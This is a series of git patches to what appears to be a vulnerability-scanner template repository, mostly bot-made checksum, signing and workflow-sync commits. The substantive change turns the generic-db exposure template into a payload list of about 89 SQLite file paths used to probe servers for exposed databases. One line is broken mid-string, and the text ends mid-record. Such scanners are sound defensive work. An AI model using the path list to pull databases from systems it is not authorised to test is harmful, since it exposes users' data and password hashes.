@@ -8136,10 +8137,10 @@ network/misconfig/erlang-daemon.yaml:5360cef90f48dc3c6bdab6df6e44245f243f423c network/misconfig/ganglia-xml-grid-monitor.yaml:dac3b1babe27265e34d19b1bac7388d65f89281b network/misconfig/memcached-stats.yaml:18844aac24b0279e3bb974baccf32256d5482109 network/misconfig/mongodb-unauth.yaml:0a25bf55d5fedd1b56c397ae27e93483018ae16a -network/misconfig/mysql-native-password.yaml:a9f7b3791ec021bec37c88303be460decc98069f +network/misconfig/mysql-native-password.yaml:610a602de84dc589c5f48b133d27f6b77f3cc422 network/misconfig/printers-info-leak.yaml:3eaf0fc4e07c21308b3bd7f387f2f6765979ad15 network/misconfig/sap-router-info-leak.yaml:a7ebbd8a06f5add2a3ded6259da9b3b3b5e0f005 -network/misconfig/tidb-native-password.yaml:cee939c1ed6cf22fbd0fc3d2d6b4047ab02a5fa0 +network/misconfig/tidb-native-password.yaml:e59b6ae7f999845de1660e740e99c300175f2845 network/misconfig/tidb-unauth.yaml:5c00fa571b47b099a046afc2a7ff5aba4bfd20fd network/misconfig/unauth-psql.yaml:4234beb83e518739f430de109340c402c96a3740 network/vulnerabilities/clockwatch-enterprise-rce.yaml:3b34549e3d1b3ddcddab7a8cdfd7b9c57c8f2d37 @@ -8170,7 +8171,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:59b8ce63bd6dd7ced361b025574c2da600135edb +templates-checksum.txt:ea62e7a3ece798218348e5276776aff198c9f2f8 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 4e054164e70f24755f60d729079d9da2cb01b304 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 20 Mar 2024 04:12:27 +0000 Subject: [PATCH 18/53] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) 
diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml
index 663e5a316a..da7f634231 100644
--- a/.github/workflows/templates-sync.yml
+++ b/.github/workflows/templates-sync.yml
@@ -32,6 +32,7 @@ on:
       - 'http/cves/2023/CVE-2023-49785.yaml'
       - 'http/cves/2023/CVE-2023-5830.yaml'
       - 'http/cves/2023/CVE-2023-5914.yaml'
+      - 'http/cves/2024/CVE-2024-1212.yaml'
       - 'http/cves/2024/CVE-2024-1698.yaml'
       - 'http/exposed-panels/bynder-panel.yaml'
       - 'http/exposed-panels/cisco/cisco-expressway-panel.yaml'
From 6f0124d586899720b35a1f62666fca927398824e Mon Sep 17 00:00:00 2001
From: GitHub Action
Date: Wed, 20 Mar 2024 04:13:43 +0000
Subject: [PATCH 19/53] Auto Template Signing [Wed Mar 20 04:13:43 UTC 2024] :robot:
---
 http/cves/2024/CVE-2024-1212.yaml | 1 +
 1 file changed, 1 insertion(+)
diff --git a/http/cves/2024/CVE-2024-1212.yaml b/http/cves/2024/CVE-2024-1212.yaml
index f2464b4726..d27b2d6a70 100644
--- a/http/cves/2024/CVE-2024-1212.yaml
+++ b/http/cves/2024/CVE-2024-1212.yaml
@@ -44,3 +44,4 @@ http:
       - type: status
         status:
           - 200
+# digest: 4a0a004730450220557f3f2f5ab7b8e23925a9acc4979743940842b4936843aaae68876e24ed24a4022100f067f077e0dae8b1aa1264efb248349fdd7e6f95341ca06cbab9c183402f4e99:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
From 0da4a266ce7d494b6fb72b24aac4d472d3667dd2 Mon Sep 17 00:00:00 2001
From: "[PDBot]"
Date: Wed, 20 Mar 2024 04:57:34 +0000
Subject: [PATCH 20/53] Auto Generated New Template Addition List [Wed Mar 20 04:57:34 UTC 2024] :robot:
---
 .new-additions | 1 +
 1 file changed, 1 insertion(+)
diff --git a/.new-additions b/.new-additions
index 932ae622c6..0b99585cdf 100644
--- a/.new-additions
+++ b/.new-additions
@@ -1,3 +1,4 @@
+dns/soa-detect.yaml
 file/keys/dependency/dependency-track.yaml
 file/keys/docker/dockerhub-pat.yaml
 file/keys/doppler/doppler-audit.yaml
From 10c586a607fb9fb78fefee84e5db124e07f66c30 Mon Sep 17 00:00:00 2001
From: GitHub Action Date: Wed, 20 Mar 2024 04:57:39 +0000 Subject: [PATCH 21/53] Auto Generated Templates Checksum [Wed Mar 20 04:57:39 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 649fc4f262..3b84c9da72 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -122,6 +122,7 @@ dns/mx-service-detector.yaml:197d6c83e04011fc0ae267e999cad25e85a19d58 dns/nameserver-fingerprint.yaml:7a9247d4f45a9699418b4afed5cea0388b147735 dns/ptr-fingerprint.yaml:ecff55b058dba2ad98432eacea8b52ce1d8e7656 dns/servfail-refused-hosts.yaml:ee2505b5619921a20332494f2281664eaf01fa87 +dns/soa-detect.yaml:1d167b28182dd5423e0327242761e0ecfb886658 dns/spoofable-spf-records-ptr.yaml:7cb8aa2d5fa1b19224a6ca0b17c5b46377892ee7 dns/txt-fingerprint.yaml:eca4bcdfb25f2922e233e4801f1beb27893f7e70 dns/worksites-detection.yaml:c54ce778fe66a138e794b87520392f285c8b6259 @@ -3085,7 +3086,7 @@ http/cves/2024/CVE-2024-1071.yaml:672dd1ef0240ede4f06d3b98caf96f2f14bd1e8e http/cves/2024/CVE-2024-1208.yaml:6f0363cecc95a2187f9fbca30620a2d39d87eb15 http/cves/2024/CVE-2024-1209.yaml:36f848394da33f75c2198b8f5b9081f212b3ecd1 http/cves/2024/CVE-2024-1210.yaml:1333fe26c55e1b4e44bcfdc0e0de5226a053f949 -http/cves/2024/CVE-2024-1212.yaml:048e1190f404d00105e446714c22fd44431bd387 +http/cves/2024/CVE-2024-1212.yaml:5671b80e9ab3c9274bd98bbeb8fe508980393f85 http/cves/2024/CVE-2024-1698.yaml:86f5580473ce4a829a4279af9ad763b52bfd4983 http/cves/2024/CVE-2024-1709.yaml:7f5ad668e9c8e5ab56afee96df8907d7ccc71e0b http/cves/2024/CVE-2024-21644.yaml:e8d58594c2dc1021f9107eee925f11791e0627e7 
@@ -8171,7 +8172,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a
 ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19
 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89
 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210
-templates-checksum.txt:ea62e7a3ece798218348e5276776aff198c9f2f8
+templates-checksum.txt:1cf7b285b6ad21a0ff4d01a0703cb9c5ac5025b4
 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0
 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4
From 5e5a61558a591c234f4df647dcbfe6bebc54d17f Mon Sep 17 00:00:00 2001
From: "[PDBot]"
Date: Wed, 20 Mar 2024 04:58:18 +0000
Subject: [PATCH 22/53] Syncing Templates
---
 .github/workflows/templates-sync.yml | 1 +
 1 file changed, 1 insertion(+)
diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml
index da7f634231..191c720b88 100644
--- a/.github/workflows/templates-sync.yml
+++ b/.github/workflows/templates-sync.yml
@@ -3,6 +3,7 @@ on:
   push:
     paths:
       - '.new-additions'
+      - 'dns/soa-detect.yaml'
       - 'file/keys/dependency/dependency-track.yaml'
       - 'file/keys/docker/dockerhub-pat.yaml'
       - 'file/keys/doppler/doppler-audit.yaml'
From 73e65180af38a5be575a0f501212642d8ac7a734 Mon Sep 17 00:00:00 2001
From: GitHub Action
Date: Wed, 20 Mar 2024 04:59:02 +0000
Subject: [PATCH 23/53] Auto Generated Templates Checksum [Wed Mar 20 04:59:02 UTC 2024] :robot:
---
 templates-checksum.txt | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)
diff --git a/templates-checksum.txt b/templates-checksum.txt
index 3b84c9da72..33a64481b4 100644
--- a/templates-checksum.txt
+++ b/templates-checksum.txt
@@ -125,6 +125,7 @@ dns/servfail-refused-hosts.yaml:ee2505b5619921a20332494f2281664eaf01fa87
 dns/soa-detect.yaml:1d167b28182dd5423e0327242761e0ecfb886658
 dns/spoofable-spf-records-ptr.yaml:7cb8aa2d5fa1b19224a6ca0b17c5b46377892ee7
 dns/txt-fingerprint.yaml:eca4bcdfb25f2922e233e4801f1beb27893f7e70
+dns/txt-service-detect.yaml:9a941b2fa182292c0b9bd2f9d549a953c469c9f8
 dns/worksites-detection.yaml:c54ce778fe66a138e794b87520392f285c8b6259
 file/android/adb-backup-enabled.yaml:4ca96a12120754577166567e047e6735d1214891
 file/android/biometric-detect.yaml:27a81bc01a126a6923c702d556dac9da857971d8
@@ -8172,7 +8173,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a
 ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19
 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89
 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210
-templates-checksum.txt:1cf7b285b6ad21a0ff4d01a0703cb9c5ac5025b4
+templates-checksum.txt:c89e2365557cf78a0e2ea79cd9143ae9b2bbd42f
 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0
 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4
From bff5fe145aaf1e3b27e836f64675039c7a60cc15 Mon Sep 17 00:00:00 2001
From: "[PDBot]"
Date: Wed, 20 Mar 2024 04:59:16 +0000
Subject: [PATCH 24/53] Auto Generated New Template Addition List [Wed Mar 20 04:59:16 UTC 2024] :robot:
---
 .new-additions | 2 ++
 1 file changed, 2 insertions(+)
diff --git a/.new-additions b/.new-additions
index 0b99585cdf..cf77a5b53a 100644
--- a/.new-additions
+++ b/.new-additions
@@ -1,4 +1,5 @@
 dns/soa-detect.yaml
+dns/txt-service-detect.yaml
 file/keys/dependency/dependency-track.yaml
 file/keys/docker/dockerhub-pat.yaml
 file/keys/doppler/doppler-audit.yaml
@@ -44,5 +45,6 @@ http/osint/phishing/kakao-login-phish.yaml
 http/osint/phishing/naver-login-phish.yaml
 http/technologies/microsoft/aspnet-version-detect.yaml
 http/technologies/microsoft/aspnetmvc-version-disclosure.yaml
+http/technologies/wing-ftp-service-detect.yaml
 http/vulnerabilities/landray/landray-eis-ws-infoleak.yaml
 network/detection/wing-ftp-detect.yaml
From 8fa711b73fc4a5ca83531803ac0a88f7120b9f46 Mon Sep 17 00:00:00 2001
From: GitHub Action
Date: Wed, 20 Mar 2024 04:59:22 +0000
Subject: [PATCH 25/53] Auto Template Signing [Wed Mar 20 04:59:22 UTC 2024] :robot:
---
 dns/soa-detect.yaml | 1 +
 1 file changed, 1 insertion(+)
diff --git a/dns/soa-detect.yaml b/dns/soa-detect.yaml
index eb6eda0782..1d98b9fa5d 100644
--- a/dns/soa-detect.yaml
+++ b/dns/soa-detect.yaml
@@ -81,3 +81,4 @@ dns:
         name: "edge-cast"
         words:
           - "edgecastdns.net"
+# digest: 4a0a00473045022052cc795314a697081c68e82277bf2be22ff53410f9a9a69af759ecefcd5b235b022100f94a899ec64709bb1f7d4e648dc091ee40029b754e4cc451882f0ccb68ff4921:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
From 4c5df2dff27cc89dbefc3d58f1abffa009fab62d Mon Sep 17 00:00:00 2001
From: "[PDBot]"
Date: Wed, 20 Mar 2024 04:59:54 +0000
Subject: [PATCH 26/53] Syncing Templates
---
 .github/workflows/templates-sync.yml | 2 ++
 1 file changed, 2 insertions(+)
diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml
index 191c720b88..9c636adef9 100644
--- a/.github/workflows/templates-sync.yml
+++ b/.github/workflows/templates-sync.yml
@@ -4,6 +4,7 @@ on:
     paths:
       - '.new-additions'
       - 'dns/soa-detect.yaml'
+      - 'dns/txt-service-detect.yaml'
       - 'file/keys/dependency/dependency-track.yaml'
       - 'file/keys/docker/dockerhub-pat.yaml'
       - 'file/keys/doppler/doppler-audit.yaml'
@@ -49,6 +50,7 @@ on:
       - 'http/osint/phishing/naver-login-phish.yaml'
       - 'http/technologies/microsoft/aspnet-version-detect.yaml'
       - 'http/technologies/microsoft/aspnetmvc-version-disclosure.yaml'
+      - 'http/technologies/wing-ftp-service-detect.yaml'
       - 'http/vulnerabilities/landray/landray-eis-ws-infoleak.yaml'
       - 'network/detection/wing-ftp-detect.yaml'
   workflow_dispatch:
From 6bd7a9e020f0d4e640d770d1a2a7a564e3802ae2 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Wed, 20 Mar 2024 12:51:44 +0530
Subject: [PATCH 27/53] updated with path variable
---
 http/exposures/files/generic-db.yaml | 187 ++++++++++++++------------
 1 file changed, 95 insertions(+), 92 deletions(-)
diff --git a/http/exposures/files/generic-db.yaml b/http/exposures/files/generic-db.yaml
index 0ac1962fbf..3d0fbff868 100644
--- a/http/exposures/files/generic-db.yaml
+++ b/http/exposures/files/generic-db.yaml
@@ -42,104 +42,107 @@ info: cvss-score: 7.5 metadata: max-request: 89 - tags: files,database,exposure,sqlite,sqlite3 + tags: files,database,exposure,sqlite,sqlite3,fuzz http: - method: GET path: - # Recommended paths found in framework official docs or unofficial tutorials - - "{{BaseURL}}/database/database.sqlite" - - "{{BaseURL}}/database/production.sqlite" - - "{{BaseURL}}/app/database/production.sqlite" - - "{{BaseURL}}/writable/db.sqlite3" - - "{{BaseURL}}/writable/database.db" - - "{{BaseURL}}/var/app.db" - - "{{BaseURL}}/var/data/db.sqlite" - - "{{BaseURL}}/var/data/data.sqlite" - - "{{BaseURL}}/app/sqlite.db" - - "{{BaseURL}}/sqlite.db" - - "{{BaseURL}}/db.sqlite3" - - "{{BaseURL}}/db/production.sqlite3" - - "{{BaseURL}}/db.sqlite" - - "{{BaseURL}}/mydb.sqlite" - - "{{BaseURL}}/app/data/app_db.sqlite" - - "{{BaseURL}}/app/webroot/database.sqlite" - - "{{BaseURL}}/app/database.sqlite" - - "{{BaseURL}}/application/databases/db.sqlite" - - "{{BaseURL}}/application/db/database.sqlite" - - "{{BaseURL}}/application/Database/db1.db" - - "{{BaseURL}}/application/database/data.db" - - "{{BaseURL}}/data/app.db" - - "{{BaseURL}}/data/sqlite.db" - - "{{BaseURL}}/data/sqlite3.db" - - "{{BaseURL}}/data/database.db" - - "{{BaseURL}}/data/production.db" - - "{{BaseURL}}/storage/database/database.sqlite" - - "{{BaseURL}}/protected/data/app.db" - - "{{BaseURL}}/protected/data/sqlite.db" - - "{{BaseURL}}/protected/data/sqlite3.db" - - "{{BaseURL}}/protected/data/database.db" - - "{{BaseURL}}/protected/data/production.db" - - "{{BaseURL}}/db/database.db" - - "{{BaseURL}}/db/database.sqlite" - - "{{BaseURL}}/app/Model/app.db" - - "{{BaseURL}}/app/Model/sqlite.db" - - "{{BaseURL}}/app/Model/sqlite3.db" - - "{{BaseURL}}/app/Model/database.db" - - "{{BaseURL}}/app/Model/production.db" - # General paths - - "{{BaseURL}}/app.db" - - "{{BaseURL}}/sqlite3.db" - - "{{BaseURL}}/app.sqlite" - - "{{BaseURL}}/app.sqlite3" - - "{{BaseURL}}/database.db" - - "{{BaseURL}}/database.sqlite" - - 
"{{BaseURL}}/database.sqlite3"
- - "{{BaseURL}}/production.db"
- - "{{BaseURL}}/production.sqlite"
- - "{{BaseURL}}/production.sqlite3"
- - "{{BaseURL}}/db/db.sqlite"
- - "{{BaseURL}}/db/db.sqlite3"
- - "{{BaseURL}}/db/sqlite.db"
- - "{{BaseURL}}/db/sqlite3.db"
- - "{{BaseURL}}/db/app.db"
- - "{{BaseURL}}/db/app.sqlite"
- - "{{BaseURL}}/db/app.sqlite3"
- - "{{BaseURL}}/db/database.sqlite3"
- - "{{BaseURL}}/db/production.db"
- - "{{BaseURL}}/db/production.sqlite"
- - "{{BaseURL}}/app/db.sqlite"
- - "{{BaseURL}}/app/db.sqlite3"
- - "{{BaseURL}}/app/sqlite3.db"
- - "{{BaseURL}}/app/app.db"
- - "{{BaseURL}}/app/app.sqlite"
- - "{{BaseURL}}/app/app.sqlite3"
- - "{{BaseURL}}/app/database.db"
- - "{{BaseURL}}/app/database.sqlite3"
- - "{{BaseURL}}/app/production.db"
- - "{{BaseURL}}/app/production.sqlite"
- - "{{BaseURL}}/app/production.sqlite3"
- - "{{BaseURL}}/data/db.sqlite"
- - "{{BaseURL}}/data/db.sqlite3"
- - "{{BaseURL}}/data/app.sqlite"
- - "{{BaseURL}}/data/app.sqlite3"
- - "{{BaseURL}}/data/database.sqlite"
- - "{{BaseURL}}/data/database.sqlite3"
- - "{{BaseURL}}/data/production.sqlite"
- - "{{BaseURL}}/data/production.sqlite3"
- - "{{BaseURL}}/database/db.sqlite"
- - "{{BaseURL}}/database/db.sqlite3"
- - "{{BaseURL}}/database/sqlite.db"
- - "{{BaseURL}}/database/sqlite3.db"
- - "{{BaseURL}}/database/app.db"
- - "{{BaseURL}}/database/app.sqlite"
- - "{{BaseURL}}/database/app.sqlite3"
- - "{{BaseURL}}/database/database.db"
- - "{{BaseURL}}/database/database.sqlite3"
- - "{{BaseURL}}/database/production.db"
- - "{{BaseURL}}/database/production.sqlite3"
+ - "{{BaseURL}}/{{path}}"
+ payloads:
+ path:
+ - database/database.sqlite
+ - database/production.db
+ - database/production.sqlite
+ - database/production.sqlite3
+ - app/database/production.sqlite
+ - writable/db.sqlite3
+ - writable/database.db
+ - var/app.db
+ - var/data/db.sqlite
+ - var/data/data.sqlite
+ - app/sqlite.db
+ - sqlite.db
+ - db.sqlite3
+ - db/production.sqlite3
+ - db.sqlite
+ - mydb.sqlite
+ - 
app/data/app_db.sqlite + - app/webroot/database.sqlite + - app/database.sqlite + - application/databases/db.sqlite + - application/db/database.sqlite + - application/Database/db1.db + - application/database/data.db + - data/app.db + - data/sqlite.db + - data/sqlite3.db + - data/database.db + - data/production.db + - storage/database/database.sqlite + - protected/data/app.db + - protected/data/sqlite.db + - protected/data/sqlite3.db + - protected/data/database.db + - protected/data/production.db + - db/database.db + - db/database.sqlite + - app/Model/app.db + - app/Model/sqlite.db + - app/Model/sqlite3.db + - app/Model/database.db + - app/Model/production.db + - app.db + - sqlite3.db + - app.sqlite + - app.sqlite3 + - database.db + - database.sqlite + - database.sqlite3 + - production.db + - production.sqlite + - production.sqlite3 + - db/db.sqlite + - db/db.sqlite3 + - db/sqlite.db + - db/sqlite3.db + - db/app.db + - db/app.sqlite + - db/app.sqlite3 + - db/database.sqlite3 + - db/production.db + - db/production.sqlite + - app/db.sqlite + - app/db.sqlite3 + - app/sqlite3.db + - app/app.db + - app/app.sqlite + - app/app.sqlite3 + - app/database.db + - app/database.sqlite3 + - app/production.db + - app/production.sqlite + - app/production.sqlite3 + - data/db.sqlite + - data/db.sqlite3 + - data/app.sqlite + - data/app.sqlite3 + - data/database.sqlite + - data/database.sqlite3 + - data/production.sqlite + - data/production.sqlite3 + - database/db.sqlite + - database/db.sqlite3 + - database/sqlite.db + - database/sqlite3.db + - database/app.db + - database/app.sqlite + - database/app.sqlite3 + - database/database.db + - database/database.sqlite3 + + stop-at-first-match: true matchers: - type: dsl dsl: From cc8ee3aa0fdc3674e60d1055ec47147a63bc2879 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 20 Mar 2024 13:38:58 +0530 Subject: [PATCH 28/53] minor update --- http/exposures/files/generic-db.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) 
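Review bot: The rewrite drops the two comments that separated framework-recommended locations from generic name/extension combinations, which was the only thing tying entries such as `database/database.sqlite` back to the per-reference annotations in `info.reference`; restore them inside the payload list as `# Framework-recommended locations (see references)` above the first entry and `# Generic name/directory combinations` above `app.db`. The 89 `path` payloads still agree with `max-request: 89`, so the refactor did not change request volume. With `stop-at-first-match: true` a host exposing several database files now reports only the first hit, which is a sensible noise trade-off for an exposure template but deserves a one-line comment so it is not mistaken for a bug. The matcher body under `dsl:` continues outside the hunk, so the actual SQLite file-header check could not be reviewed here.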
diff --git a/http/exposures/files/generic-db.yaml b/http/exposures/files/generic-db.yaml index 3d0fbff868..d6f33746df 100644 --- a/http/exposures/files/generic-db.yaml +++ b/http/exposures/files/generic-db.yaml @@ -4,7 +4,8 @@ info: name: Generic Database File - Exposure author: Michal Mikolas (nanuqcz) severity: high - description: This is collection of some web frameworks recommendation or default configuration for SQLite database file location. If this file is publicly accessible due to server misconfiguration, it could result in application data leak including users sensitive data, password hashes etc. + description: | + This is collection of some web frameworks recommendation or default configuration for SQLite database file location. If this file is publicly accessible due to server misconfiguration, it could result in application data leak including users sensitive data, password hashes etc. reference: - https://laravel.com/docs/11.x/database#sqlite-configuration # database/database.sqlite - https://laravel.com/docs/5.2/database # database/database.sqlite From faefc8a92e83377104b005e1790b41da54bc6383 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 20 Mar 2024 08:12:01 +0000 Subject: [PATCH 29/53] Auto Generated New Template Addition List [Wed Mar 20 08:12:01 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index cf77a5b53a..e60a673523 100644 --- a/.new-additions +++ b/.new-additions @@ -40,6 +40,7 @@ http/exposed-panels/neocase-hrportal-panel.yaml http/exposed-panels/osnexus-panel.yaml http/exposed-panels/posteio-admin-panel.yaml http/exposed-panels/skeepers-panel.yaml +http/exposures/files/generic-db.yaml http/misconfiguration/installer/posteio-installer.yaml http/osint/phishing/kakao-login-phish.yaml http/osint/phishing/naver-login-phish.yaml From 20e58460b4cf676ad29ddf535b79298e1e5495b9 Mon Sep 17 00:00:00 2001 
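Review bot: The description is only switched to a block scalar while its grammar errors are carried over; since the text is being touched anyway, tighten it to `This is a collection of SQLite database file locations that several web frameworks recommend or use by default. If such a file is publicly reachable due to a server misconfiguration, it can leak application data including users' sensitive data and password hashes.` The `# database/database.sqlite` annotations on the reference lines are useful provenance for the path list and should stay as they are.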
From: GitHub Action Date: Wed, 20 Mar 2024 08:12:15 +0000 Subject: [PATCH 30/53] Auto Generated Templates Checksum [Wed Mar 20 08:12:15 UTC 2024] :robot: --- templates-checksum.txt | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 33a64481b4..6048164bfe 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -122,7 +122,7 @@ dns/mx-service-detector.yaml:197d6c83e04011fc0ae267e999cad25e85a19d58 dns/nameserver-fingerprint.yaml:7a9247d4f45a9699418b4afed5cea0388b147735 dns/ptr-fingerprint.yaml:ecff55b058dba2ad98432eacea8b52ce1d8e7656 dns/servfail-refused-hosts.yaml:ee2505b5619921a20332494f2281664eaf01fa87 -dns/soa-detect.yaml:1d167b28182dd5423e0327242761e0ecfb886658 +dns/soa-detect.yaml:5c758030190eea7fc6934a23dd266362ee2a355b dns/spoofable-spf-records-ptr.yaml:7cb8aa2d5fa1b19224a6ca0b17c5b46377892ee7 dns/txt-fingerprint.yaml:eca4bcdfb25f2922e233e4801f1beb27893f7e70 dns/txt-service-detect.yaml:9a941b2fa182292c0b9bd2f9d549a953c469c9f8 @@ -4536,6 +4536,7 @@ http/exposures/files/filezilla.yaml:a04a2de7145d42c6cc63a59edf5c13c9660218b5 http/exposures/files/ftpconfig.yaml:37d46a4726edffd9d686224d0a3be7df6ec2780d http/exposures/files/gcloud-access-token.yaml:62d8288a11a5350a01d3e0041ac28c92b7889910 http/exposures/files/gcloud-credentials.yaml:2343f7b00527e9831a765ea61960df72176b1bf1 +http/exposures/files/generic-db.yaml:1f5cc209039fbe3d53d29286d46bea2e8ffada19 http/exposures/files/get-access-token-json.yaml:81c5d4a38a413cda6fbf584f3a955d89dc48a28d http/exposures/files/git-mailmap.yaml:456e18f1c474d4628acc7356b1f816f1fee19fcf http/exposures/files/github-gemfile-files.yaml:451504bab87de4abd36fd46ad03629bdc24ffe5e 
@@ -6680,6 +6681,7 @@ http/technologies/web-ftp-detect.yaml:ceaf8743ca94c6fbf3e7d380d0ed9be6f3796120 http/technologies/web-suite-detect.yaml:94ce185f9aee3a32ab9391218413ba5b4efd408f http/technologies/weblogic-detect.yaml:57acbd03a2cd58cd94f92843578359a5b479ac5d http/technologies/werkzeug-debugger-detect.yaml:af81a25156ac286ceb63a2599e8b8ddfc6a34542 +http/technologies/wing-ftp-service-detect.yaml:416707a344d027b1224855a9c085642fadcccf38 http/technologies/wms-server-detect.yaml:a12dcf5c63bb483cadc2179824ea7bc811565a9d http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8 http/technologies/wordpress/plugins/ad-inserter.yaml:e1496850b2a8ebec1b470544d5bb38e52760d900 @@ -8173,7 +8175,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:c89e2365557cf78a0e2ea79cd9143ae9b2bbd42f +templates-checksum.txt:0bd557ae0e24c541eae22a598daa4f74b79cfd0f wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 35c7f1e4671d1fc0a75a3312328919fb92ecb365 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Wed, 20 Mar 2024 08:12:47 +0000 Subject: [PATCH 31/53] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 9c636adef9..52ff2ed46f 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml 
@@ -45,6 +45,7 @@ on: - 'http/exposed-panels/osnexus-panel.yaml' - 'http/exposed-panels/posteio-admin-panel.yaml' - 'http/exposed-panels/skeepers-panel.yaml' + - 'http/exposures/files/generic-db.yaml' - 'http/misconfiguration/installer/posteio-installer.yaml' - 'http/osint/phishing/kakao-login-phish.yaml' - 'http/osint/phishing/naver-login-phish.yaml' From cbf2c2568d5c60c9b473ee886a1cd07c196d3f8c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 20 Mar 2024 08:13:55 +0000 Subject: [PATCH 32/53] Auto Template Signing [Wed Mar 20 08:13:55 UTC 2024] :robot: --- dns/txt-service-detect.yaml | 1 + http/exposures/files/generic-db.yaml | 1 + http/technologies/wing-ftp-service-detect.yaml | 1 + 3 files changed, 3 insertions(+) diff --git a/dns/txt-service-detect.yaml b/dns/txt-service-detect.yaml index d286a8d2fe..17a8d5e012 100644 --- a/dns/txt-service-detect.yaml +++ b/dns/txt-service-detect.yaml @@ -218,3 +218,4 @@ dns: name: "whimsical" words: - "whimsical" +# digest: 490a00463044022043132b95ad11ec72665418855d60e0d979abbe9957b18f9170981f4f4af22a72022054d2942e7554851cd1f043f99d5e119ff9e8943a635a891927b1897d270383b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposures/files/generic-db.yaml b/http/exposures/files/generic-db.yaml index d6f33746df..99da464258 100644 --- a/http/exposures/files/generic-db.yaml +++ b/http/exposures/files/generic-db.yaml @@ -152,3 +152,4 @@ http: - '!contains(body, " Date: Wed, 20 Mar 2024 08:14:48 +0000 Subject: [PATCH 33/53] Auto Generated cves.json [Wed Mar 20 08:14:48 UTC 2024] :robot: --- cves.json | 14 ++++++++++++-- cves.json-checksum.txt | 2 +- 2 files changed, 13 insertions(+), 3 deletions(-) diff --git a/cves.json b/cves.json index 58062848e9..bef7f939af 100644 --- a/cves.json +++ b/cves.json 
@@ -1386,7 +1386,7 @@ {"ID":"CVE-2021-40149","Info":{"Name":"Reolink E1 Zoom Camera \u003c=3.0.0.716 - Private Key Disclosure","Severity":"medium","Description":"Reolink E1 Zoom Camera versions 3.0.0.716 and below suffer from a private key (RSA) disclosure vulnerability.\n","Classification":{"CVSSScore":"5.9"}},"file_path":"http/cves/2021/CVE-2021-40149.yaml"} {"ID":"CVE-2021-40150","Info":{"Name":"Reolink E1 Zoom Camera \u003c=3.0.0.716 - Information Disclosure","Severity":"high","Description":"Reolink E1 Zoom camera through 3.0.0.716 is susceptible to information disclosure. The web server discloses its configuration via the /conf/ directory that is mapped to a publicly accessible path. An attacker with network-level access to the camera can can download the entire NGINX/FastCGI configurations by querying the /conf/nginx.conf or /conf/fastcgi.conf 